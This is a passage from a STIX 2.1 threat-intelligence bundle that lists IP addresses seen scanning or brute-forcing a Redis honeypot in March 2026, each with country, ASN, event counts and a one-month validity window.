      "id": "indicator--36820bcc-30f6-4b74-b090-a282e5991ab6",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-22T19:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '40.76.116.231']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-22T19:25:13.000Z",
      "valid_until": "2026-04-23T19:25:12.000Z"
    },
    {
      "created": "2026-03-22T19:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=12; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0",
      "id": "indicator--8e3acc7c-5d55-4655-8099-d49bd15f7809",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-22T19:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '66.132.172.210']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-22T19:25:13.000Z",
      "valid_until": "2026-04-23T19:25:12.000Z"
    },
    {
      "created": "2026-03-23T00:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=9; ports=6379; cc=CN; asn=9808; asn_org=China Mobile Communications Group Co., Ltd.; redis_cmd_hits=0",
      "id": "indicator--97368846-d340-45b8-a746-39f0f9e62ec0",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-23T00:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '36.133.118.248']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-23T00:25:13.000Z",
      "valid_until": "2026-04-24T00:25:12.000Z"
    },
    {
      "created": "2026-03-23T04:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=10; ports=6379; cc=CN; asn=56046; asn_org=China Mobile communications corporation; cats=Generic Protocol Command Decode; redis_cmd_hits=0",
      "id": "indicator--3774f2cb-c02f-4506-8fa9-2c9d1b02b361",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-23T04:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '36.139.84.140']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-23T04:25:13.000Z",
      "valid_until": "2026-04-24T04:25:12.000Z"
    },
    {
      "created": "2026-03-23T06:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=20; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; cats=Detection of a Network Scan,Generic Protocol Command Decode; redis_cmds=GET / HTTP/1.1; redis_cmd_hits=0",
      "id": "indicator--fff4a3d9-3694-4f5a-8738-72d29230568d",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-23T06:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '143.198.64.48']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-23T06:25:13.000Z",
      "valid_until": "2026-04-24T06:25:12.000Z"
    },
    {
      "created": "2026-03-23T07:25:14.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=4; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0",
      "id": "indicator--932cbb99-e451-4a2e-ba09-b339604e98ae",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-23T07:25:14.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '138.197.94.116']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-23T07:25:14.000Z",
      "valid_until": "2026-04-24T07:25:13.000Z"
    },
    {
      "created": "2026-03-23T07:25:14.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=396982; asn_org=Google LLC; cats=Generic Protocol Command Decode; redis_cmd_hits=0",
      "id": "indicator--cb52e5ee-fdaa-4785-8ea4-0d0c12cdec07",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-23T07:25:14.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '147.185.132.225']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-23T07:25:14.000Z",
      "valid_until": "2026-04-24T07:25:13.000Z"
    },
    {
      "created": "2026-03-23T07:25:14.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=4; ports=6379; cc=US; asn=215925; asn_org=Vpsvault.host Ltd; redis_cmd_hits=0",
      "id": "indicator--6a49a9d8-85cc-4aa5-8651-07c05439c338",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-23T07:25:14.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '87.121.84.50']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-23T07:25:14.000Z",
      "valid_until": "2026-04-24T07:25:13.000Z"
    },
    {
      "created": "2026-03-23T08:25:17.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0",
      "id": "indicator--6d572bf9-74fe-4b42-82b9-4ee3b06c7ca1",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-23T08:25:17.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '204.48.29.18']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-23T08:25:17.000Z",
      "valid_until": "2026-04-24T08:25:16.000Z"
    },
    {
      "created": "2026-03-23T11:25:12.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=4; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0",
      "id": "indicator--129bca9e-a984-4428-b136-7c2c6ee1e24d",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-23T11:25:12.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '167.99.0.28']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-23T11:25:12.000Z",
      "valid_until": "2026-04-24T11:25:05.000Z"
    },
    {
      "created": "2026-03-23T12:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=26; ports=6379; cc=US; asn=6939; asn_org=Hurricane Electric LLC; redis_cmd_hits=0",
      "id": "indicator--da507950-a9ce-46b4-b0f5-189c4db90778",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-23T12:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '64.62.156.38']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-23T12:25:13.000Z",
      "valid_until": "2026-04-24T12:25:12.000Z"
    },
    {
      "created": "2026-03-23T12:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=4; ports=6379; cc=US; asn=6939; asn_org=Hurricane Electric LLC; redis_cmd_hits=0",
      "id": "indicator--f248c89a-4f30-4a60-bf57-a0cd3b205ab5",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-23T12:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '64.62.156.48']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-23T12:25:13.000Z",
      "valid_until": "2026-04-24T12:25:12.000Z"
    },
    {
      "created": "2026-03-23T13:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=63949; asn_org=Akamai Connected Cloud; redis_cmd_hits=0",
      "id": "indicator--2b4016ee-e7d6-490d-8bae-4d3c4aee8acf",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-23T13:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '45.56.83.149']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-23T13:25:13.000Z",
      "valid_until": "2026-04-24T13:25:12.000Z"
    },
    {
      "created": "2026-03-23T16:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=9; ports=6379; cc=CN; asn=37963; asn_org=Hangzhou Alibaba Advertising Co.,Ltd.; redis_cmd_hits=0",
      "id": "indicator--e9961e51-732b-419c-97f2-f69d67492e8b",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-23T16:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '8.142.178.141']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-23T16:25:13.000Z",
      "valid_until": "2026-04-24T16:25:12.000Z"
    },
    {
      "created": "2026-03-23T17:25:06.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=213412; asn_org=ONYPHE SAS; redis_cmd_hits=0",
      "id": "indicator--ed938d28-aeb4-4795-abb9-d3fecb6e0bed",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-23T17:25:06.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '195.184.76.157']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-23T17:25:06.000Z",
      "valid_until": "2026-04-24T17:25:05.000Z"
    },
    {
      "created": "2026-03-23T17:25:06.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=13; ports=6379; cc=US; asn=213412; asn_org=ONYPHE SAS; cats=Generic Protocol Command Decode; redis_cmds=GET / HTTP/1.1; redis_cmd_hits=0",
      "id": "indicator--9657815e-65a9-4515-8b4a-312dbb9e0e54",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-23T17:25:06.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '91.230.168.97']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-23T17:25:06.000Z",
      "valid_until": "2026-04-24T17:25:05.000Z"
    },
    {
      "created": "2026-03-23T17:25:06.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=15; ports=6379; cc=US; asn=213412; asn_org=ONYPHE SAS; cats=Generic Protocol Command Decode; redis_cmd_hits=0",
      "id": "indicator--015591cd-b0c7-454f-bae3-400cd06f71dc",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-23T17:25:06.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '91.230.168.98']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-23T17:25:06.000Z",
      "valid_until": "2026-04-24T17:25:05.000Z"
    },
    {
      "created": "2026-03-23T18:25:08.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=11; ports=6379; cc=US; asn=396982; asn_org=Google LLC; cats=Generic Protocol Command Decode; redis_cmd_hits=0",
      "id": "indicator--2243b288-c1df-4558-bf89-cfd48c1879ab",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-23T18:25:08.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '198.235.24.165']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-23T18:25:08.000Z",
      "valid_until": "2026-04-24T18:25:07.000Z"
    },
    {
      "created": "2026-03-23T18:25:08.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=16; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0",
      "id": "indicator--6d23c47d-2385-4b09-95ee-d5fbfd25f432",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-23T18:25:08.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '40.124.173.171']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-23T18:25:08.000Z",
      "valid_until": "2026-04-24T18:25:07.000Z"
    },
    {
      "created": "2026-03-23T19:25:08.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=FR; asn=213412; asn_org=ONYPHE SAS; redis_cmd_hits=0",
      "id": "indicator--406ccc66-5572-420f-a0e5-ef28ff6ca8a9",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-23T19:25:08.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '91.196.152.157']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-23T19:25:08.000Z",
      "valid_until": "2026-04-24T19:25:07.000Z"
    },
    {
      "created": "2026-03-23T19:25:08.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=14; ports=6379; cc=FR; asn=213412; asn_org=ONYPHE SAS; cats=Generic Protocol Command Decode; redis_cmd_hits=0",
      "id": "indicator--dcede044-0de9-4d5f-a580-1ae9f9adb0ac",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-23T19:25:08.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '91.196.152.63']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-23T19:25:08.000Z",
      "valid_until": "2026-04-24T19:25:07.000Z"
    },
    {
      "created": "2026-03-23T19:25:08.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=14; ports=6379; cc=FR; asn=213412; asn_org=ONYPHE SAS; cats=Generic Protocol Command Decode; redis_cmds=GET / HTTP/1.1; redis_cmd_hits=0",
      "id": "indicator--83dc463c-450f-4ba2-bba6-11f8cb25004f",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-23T19:25:08.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '91.196.152.83']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-23T19:25:08.000Z",
      "valid_until": "2026-04-24T19:25:07.000Z"
    },
    {
      "created": "2026-03-23T20:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=12; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0",
      "id": "indicator--5e8758c1-ab15-4fdb-a2d9-d3d63e35a076",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-23T20:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '167.94.138.33']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-23T20:25:13.000Z",
      "valid_until": "2026-04-24T20:25:12.000Z"
    },
    {
      "created": "2026-03-24T01:25:14.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=20; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0",
      "id": "indicator--deb32119-e68d-4e5d-a3b5-2355f87ecf72",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-24T01:25:14.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '147.182.166.69']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-24T01:25:14.000Z",
      "valid_until": "2026-04-25T01:25:13.000Z"
    },
    {
      "created": "2026-03-24T03:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=15; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0",
      "id": "indicator--90a682cc-138a-4e7c-97ea-0df7f81cc8a1",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-24T03:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '20.168.121.140']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-24T03:25:13.000Z",
      "valid_until": "2026-04-25T03:25:12.000Z"
    },
    {
      "created": "2026-03-24T04:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=19; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; cats=Detection of a Network Scan,Generic Protocol Command Decode; redis_cmds=GET / HTTP/1.1; redis_cmd_hits=0",
      "id": "indicator--adaec145-0f13-41a5-bfdf-c3055fa493e0",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-24T04:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '157.245.118.24']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-24T04:25:13.000Z",
      "valid_until": "2026-04-25T04:25:12.000Z"
    },
    {
      "created": "2026-03-24T04:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=101; ports=6379; cc=US; asn=16509; asn_org=Amazon.com, Inc.; cats=Generic Protocol Command Decode,Misc activity; redis_cmds=GET / HTTP/1.1; redis_cmd_hits=0; cmd=\"SSH-2.0-Go  \"",
      "id": "indicator--3988ee7b-209d-4866-a19b-9306446fb83f",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-24T04:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '3.149.230.178']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-24T04:25:13.000Z",
      "valid_until": "2026-04-25T04:25:12.000Z"
    },
    {
      "created": "2026-03-24T04:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=37963; asn_org=Hangzhou Alibaba Advertising Co.,Ltd.; redis_cmd_hits=0",
      "id": "indicator--acd58bf8-e064-4aeb-a092-1005c6c9210f",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-24T04:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '47.117.146.179']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-24T04:25:13.000Z",
      "valid_until": "2026-04-25T04:25:12.000Z"
    },
    {
      "created": "2026-03-24T06:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=PL; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0",
      "id": "indicator--1071bd93-c041-4794-93e4-a086069d5819",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-24T06:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '20.215.89.29']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-24T06:25:13.000Z",
      "valid_until": "2026-04-25T06:25:12.000Z"
    },
    {
      "created": "2026-03-24T08:25:14.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=12; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0",
      "id": "indicator--4efc883e-a6fc-4626-839b-eb0ea5c033b3",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-24T08:25:14.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '66.132.172.182']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-24T08:25:14.000Z",
      "valid_until": "2026-04-25T08:25:12.000Z"
    },
    {
      "created": "2026-03-24T08:25:14.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0",
      "id": "indicator--1e28191e-effd-4ef1-80b7-7db19124abf3",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-24T08:25:14.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '66.132.172.238']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-24T08:25:14.000Z",
      "valid_until": "2026-04-25T08:25:12.000Z"
    },
    {
      "created": "2026-03-24T09:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=FR; asn=51167; asn_org=Contabo GmbH; redis_cmd_hits=0",
      "id": "indicator--2257d480-5943-4b7c-b391-adc870891983",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-24T09:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '89.117.49.133']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-24T09:25:13.000Z",
      "valid_until": "2026-04-25T09:25:12.000Z"
    },
    {
      "created": "2026-03-24T10:25:14.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0",
      "id": "indicator--92220305-ace6-4809-85b1-07cef07e55fe",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-24T10:25:14.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '135.222.174.121']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-24T10:25:14.000Z",
      "valid_until": "2026-04-25T10:25:12.000Z"
    },
    {
      "created": "2026-03-24T13:25:59.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=21; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0",
      "id": "indicator--0f56676c-4612-4fe7-8ef9-89627400d239",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-24T13:25:59.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '147.182.178.32']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-24T13:25:59.000Z",
      "valid_until": "2026-04-25T13:25:08.000Z"
    },
    {
      "created": "2026-03-24T13:25:59.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=17; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0",
      "id": "indicator--f90bd015-d301-455f-a9de-c237ff46435d",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-24T13:25:59.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '157.245.84.97']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-24T13:25:59.000Z",
      "valid_until": "2026-04-25T13:25:08.000Z"
    },
    {
      "created": "2026-03-24T13:25:59.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=63949; asn_org=Akamai Connected Cloud; redis_cmd_hits=0",
      "id": "indicator--511d0518-7988-4840-8feb-228d67ac4db3",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-24T13:25:59.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '172.236.111.197']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-24T13:25:59.000Z",
      "valid_until": "2026-04-25T13:25:08.000Z"
    },
    {
      "created": "2026-03-24T16:25:26.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=10; ports=6379; cc=CN; asn=9808; asn_org=China Mobile Communications Group Co., Ltd.; redis_cmd_hits=0",
      "id": "indicator--5633d55c-0285-45e3-9038-1e43cdc01d81",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-24T16:25:26.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '36.212.19.93']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-24T16:25:26.000Z",
      "valid_until": "2026-04-25T16:25:11.000Z"
    },
    {
      "created": "2026-03-24T19:25:08.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=45090; asn_org=Shenzhen Tencent Computer Systems Company Limited; redis_cmd_hits=0",
      "id": "indicator--a18989c6-31b2-41c7-9f3b-7c280cbbebd2",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-24T19:25:08.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '119.29.60.36']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-24T19:25:08.000Z",
      "valid_until": "2026-04-25T19:25:05.000Z"
    },
    {
      "created": "2026-03-25T01:25:15.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=396982; asn_org=Google LLC; cats=Generic Protocol Command Decode; redis_cmd_hits=0",
      "id": "indicator--5d8473dd-87a1-471c-b9f1-b010099ed76f",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-25T01:25:15.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '205.210.31.107']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-25T01:25:15.000Z",
      "valid_until": "2026-04-26T01:25:13.000Z"
    },
    {
      "created": "2026-03-25T01:25:15.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=15; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0",
      "id": "indicator--92b101c8-f419-44f3-b7b2-587e2bf497ae",
      "labels": [
        "bruteforce"
